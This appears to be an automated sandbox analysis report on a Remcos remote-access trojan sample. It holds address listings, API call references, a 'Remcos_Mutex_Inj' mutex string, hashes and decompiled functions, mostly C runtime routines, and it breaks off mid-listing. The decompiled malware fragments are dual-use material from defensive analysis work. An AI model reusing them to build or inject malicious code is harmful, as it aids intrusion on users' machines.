0x0040d17a
0x0040d186
0x0040d188
0x0040d199
0x0040d1a6
0x0040d1a6
0x0040d199
0x0040d1bb
0x0040d235
0x0040d238
0x0040d245
0x0040d1bd
0x0040d1bd
0x0040d1ce
0x0040d1d0
0x0040d1e4
0x0040d1ec
0x0040d206
0x0040d227
0x0040d208
0x0040d20f
0x0040d21d
0x0040d223
0x0040d230
0x00000000
0x0040d230
0x0040d1bb
0x0040d00e
0x0040d016
0x0040d022
0x0040d027
0x0040d031
0x0040d098
0x0040d043
0x0040d054
0x0040d062
0x0040d079
0x0040d07e
0x0040d08e
0x0040d0e9
0x0040d0f1
0x0040d106
0x0040d11d
0x0040d12c
0x0040d159
0x0040d161
0x0040d161
0x00000000
0x0040d13d
0x0040d144
0x0040d14c
0x00000000
0x0040d14c
0x0040d12c
0x0040d10b
0x0040d113
0x00000000
0x0040d113
0x0040d093
0x0040d093
0x0040d0af
0x0040d0b5
0x0040d0c7
0x00000000
0x00000000
0x0040d0cd
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046B4F8,0046B558,00000001), ref: 0040CFF0
CreateToolhelp32Snapshot.KERNEL32 ref: 0040D016
Process32FirstW.KERNEL32(00000000,?), ref: 0040D031
Process32NextW.KERNEL32(0040C904,0000022C), ref: 0040D0A2
CloseHandle.KERNEL32(0040C904,?,00000000,?,?,?), ref: 0040D0AF
CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D1C5
CloseHandle.KERNEL32(00000000), ref: 0040D227

Part of subcall function 00416FF7: OpenProcess.KERNEL32(00000410,00000000,?,00000000,00000000), ref: 0041700C

Strings

Inj, xrefs: 0040D211
Remcos_Mutex_Inj, xrefs: 0040D1BD
Program Files (x86)\, xrefs: 0040D19B
Program Files\, xrefs: 0040D189

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
API String ID: 193334293-694575909
Opcode ID: 62c44fec2100ca1232334afe2fea296fc168cbaed3c459b93cdec7f68882ac37
Instruction ID: 1c962548d8a907fa820c157af2ce34c412142745a49de050148e8d64553b3610
Opcode Fuzzy Hash: 62c44fec2100ca1232334afe2fea296fc168cbaed3c459b93cdec7f68882ac37
Instruction Fuzzy Hash: 91612F30900109AADF14FBA1D9569EEB735AF10308F50417FB906771E2EF785E4ECA99

Uniqueness

Uniqueness Score: -1.00%

Function 00446F60, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00446F60(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E0043DAF9(0, 1, 0x50);
					_v8 = _t234;
					E0043E9A5(0);
					if(_t234 != 0) {
						_t227 = E0043DAF9(0, 1, 4);
						_v12 = _t227;
						E0043E9A5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x469188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E0043DAF9(0, 1, 4);
							_v16 = _t232;
							E0043E9A5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E00449D60(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E00449D60(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E00449D60(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E00449D60(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E00449D60(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E00449D60(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E00449D60(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E00449D60(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E00449D60(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E00449D60(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E00449D60(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E00449D60(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E00449D60(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E00449D60(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E00449D60(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E00449D60(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E00449D60(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E00449D60(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E00449D60(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E00449D60(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E00449D60(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00446E62(_v8);
								E0043E9A5(_v8);
								E0043E9A5(_v12);
								E0043E9A5(_v16);
								goto L4;
							}
							E0043E9A5(_t234);
							E0043E9A5(_v12);
							L7:
							goto L4;
						}
						E0043E9A5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x469188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E0043E9A5( *(_t210 + 0x88));
							E0043E9A5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x00446f60
0x00446f69
0x00446f70
0x00446f73
0x00446f76
0x00446f7f
0x00446fa1
0x00446fa5
0x00446fa8
0x00446fb2
0x00446fc5
0x00446fc9
0x00446fcc
0x00446fd6
0x00446fe8
0x0044727e
0x0044727f
0x00447281
0x00447289
0x0044728d
0x00447292
0x0044729d
0x004472a9
0x004472b5
0x004472c1
0x004472c7
0x004472cb
0x004472cd
0x004472cd
0x00000000
0x004472cb
0x00446ff7
0x00446ffb
0x00446ffe
0x00447008
0x0044701c
0x00447022
0x00447037
0x0044704b
0x00447062
0x0044707c
0x00447084
0x00447096
0x004470ad
0x004470c4
0x004470de
0x004470f5
0x0044710c
0x00447123
0x0044713d
0x00447154
0x0044716b
0x00447182
0x0044719c
0x004471b3
0x004471ca
0x004471e1
0x004471fb
0x00447217
0x00447245
0x00447258
0x00447249
0x0044724d
0x00447261
0x00000000
0x00000000
0x00447263
0x00447265
0x00447268
0x0044726a
0x0044726d
0x00447253
0x00447255
0x00447257
0x00447257
0x00447257
0x0044724d
0x00000000
0x0044725d
0x0044721d
0x00447223
0x0044722c
0x00447235
0x00000000
0x0044723a
0x0044700b
0x00447014
0x00446fde
0x00000000
0x00446fde
0x00446fd9
0x00000000
0x00446fd9
0x00446fb4
0x00000000
0x00446f89
0x00446f89
0x00446f8b
0x00446f8e
0x004472cf
0x004472cf
0x004472d7
0x004472d9
0x004472d9
0x004472e1
0x004472e6
0x004472ea
0x004472f2
0x004472fa
0x00447300
0x004472ea
0x00447304
0x00447309
0x0044730f
0x00000000
0x0044730f

APIs

_free.LIBCMT ref: 00446FA8
_free.LIBCMT ref: 00446FCC
_free.LIBCMT ref: 00446FD9
_free.LIBCMT ref: 00446FFE
_free.LIBCMT ref: 0044700B
_free.LIBCMT ref: 00447014
_free.LIBCMT ref: 004472F2
_free.LIBCMT ref: 004472FA

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 50e11af6cf11ea57e1253c2408ccf40d7986a01f97ab9988244b1b5ceffbc63c
Instruction ID: 942041ed16a05b85fa7ff2d648e8a49932f68b4706c7b0991a358bf0b007b959
Opcode Fuzzy Hash: 50e11af6cf11ea57e1253c2408ccf40d7986a01f97ab9988244b1b5ceffbc63c
Instruction Fuzzy Hash: 8AC155B1E40208AFEB20DBA9DC82FDF77BCAF49704F140156FA04EB282D6B49D419765

Uniqueness

Uniqueness Score: -1.00%

Function 0044E06E, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0044E06E(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = L0044DDD1(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = L00446C55(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = L0044DD3C();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								L00446B9E(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46a800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L0044DAEF(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46a800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = L0044DD3C();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46a800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											L00439B79(GetLastError());
											 *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											L00446D67( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = L0044DF4D(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										L00443CCE(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							L00439B79(_t270);
							 *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46a800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(L00439BAF())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46a800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							L00439B79(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = L0044DD3C();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(L00439B9C()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(L00439BAF())) = 0x18;
						goto L2;
					}
				} else {
					 *(L00439B9C()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(L00439BAF()));
				}
			}

0x0044e091
0x0044e095
0x0044e096
0x0044e096
0x0044e096
0x0044e098
0x0044e09e
0x0044e0b9
0x0044e0be
0x0044e0c1
0x0044e0c3
0x0044e0c5
0x0044e0e4
0x0044e0eb
0x0044e0f2
0x0044e0f5
0x0044e101
0x0044e104
0x0044e10c
0x0044e10d
0x0044e110
0x0044e110
0x0044e117
0x0044e119
0x0044e11c
0x0044e124
0x0044e127
0x0044e194
0x0044e195
0x0044e19b
0x0044e19d
0x0044e1e6
0x0044e1e9
0x0044e1f2
0x0044e1f5
0x0044e1f8
0x0044e1fa
0x0044e1fa
0x0044e1fa
0x0044e1eb
0x0044e1ee
0x0044e1ee
0x0044e1ff
0x0044e202
0x0044e20e
0x0044e213
0x0044e21f
0x0044e229
0x0044e22d
0x0044e237
0x0044e23a
0x0044e245
0x0044e24a
0x0044e25a
0x0044e25d
0x0044e261
0x0044e262
0x0044e268
0x0044e26d
0x0044e270
0x0044e272
0x0044e274
0x0044e279
0x0044e27c
0x0044e27e
0x0044e2a8
0x0044e2cc
0x0044e2d0
0x0044e2d4
0x0044e2d6
0x0044e2da
0x0044e2dc
0x0044e2e6
0x0044e2e9
0x0044e2f0
0x0044e2f0
0x0044e2f0
0x0044e2f0
0x0044e2da
0x0044e2f5
0x0044e301
0x0044e303
0x0044e38e
0x0044e38e
0x00000000
0x0044e309
0x0044e309
0x0044e30d
0x00000000
0x00000000
0x0044e312
0x0044e324
0x0044e32c
0x0044e32f
0x0044e330
0x0044e333
0x0044e33a
0x0044e33f
0x0044e342
0x0044e376
0x0044e380
0x0044e380
0x0044e38a
0x00000000
0x0044e38a
0x0044e34b
0x0044e364
0x0044e36b
0x0044e18e
0x00000000
0x0044e18e
0x0044e303
0x0044e280
0x00000000
0x0044e24c
0x0044e253
0x0044e256
0x0044e258
0x0044e282
0x0044e284
0x00000000
0x0044e28a
0x00000000
0x0044e258
0x0044e24a
0x0044e1a5
0x0044e1a8
0x0044e1c3
0x0044e1c8
0x0044e1ce
0x0044e1d0
0x0044e1db
0x0044e1db
0x00000000
0x0044e1d0
0x0044e129
0x0044e130
0x0044e132
0x0044e169
0x0044e169
0x0044e173
0x0044e176
0x0044e17d
0x0044e17d
0x0044e17d
0x0044e189
0x00000000
0x0044e189
0x0044e134
0x0044e138
0x00000000
0x00000000
0x0044e13a
0x0044e149
0x0044e14e
0x0044e151
0x0044e152
0x0044e155
0x0044e155
0x0044e15c
0x0044e15e
0x0044e161
0x0044e164
0x0044e167
0x00000000
0x00000000
0x00000000
0x0044e0c7
0x0044e0cc
0x0044e0cf
0x0044e0d6
0x00000000
0x0044e0d6
0x0044e0a0
0x0044e0a5
0x0044e0ab
0x0044e0ad
0x00000000
0x0044e0b2

APIs

Part of subcall function 0044DD3C: CreateFileW.KERNEL32(00000000,00000000,?,0044E117,?,?,00000000,?,0044E117,00000000,0000000C), ref: 0044DD59

GetLastError.KERNEL32 ref: 0044E182
__dosmaperr.LIBCMT ref: 0044E189
GetFileType.KERNEL32(00000000), ref: 0044E195
GetLastError.KERNEL32 ref: 0044E19F
__dosmaperr.LIBCMT ref: 0044E1A8
CloseHandle.KERNEL32(00000000), ref: 0044E1C8
CloseHandle.KERNEL32(?), ref: 0044E312
GetLastError.KERNEL32 ref: 0044E344
__dosmaperr.LIBCMT ref: 0044E34B

Strings

H, xrefs: 0044E2D0

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 6c2b152375a01f225382fce18109c7ae7221125c533d4170d2b487dbc43acfa0
Instruction ID: a6e51dc87044bb9857cdf45c74f3471049aa72040617a5e46eae841a342b850c
Opcode Fuzzy Hash: 6c2b152375a01f225382fce18109c7ae7221125c533d4170d2b487dbc43acfa0
Instruction Fuzzy Hash: 0BA15732A101148FEF19AF69DC417AE7BB1BF0A324F14015EF811AB391DB789C12CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0044D535, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044D535(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46900c; // 0x7c295e5c
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E0043E989(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E0043E989(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0043E13D(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E0044FBB0();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0043E13D(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E0044FBB0();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E004408AC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E0043025F(_t130);
													}
												}
											}
										}
									}
								}
								E0043025F(_t100);
							}
						}
					}
				}
				L63:
				return E0042F3BB(_v8 ^ _t132);
			}

0x0044d53d
0x0044d544
0x0044d54c
0x0044d54f
0x0044d555
0x0044d558
0x0044d55b
0x0044d55f
0x0044d562
0x0044d567
0x0044d58e
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d569
0x0044d571
0x0044d573
0x0044d577
0x0044d577
0x0044d57c
0x0044d59a
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d57e
0x0044d587
0x0044d59c
0x0044d59c
0x0044d5a1
0x0044d5a8
0x0044d5ab
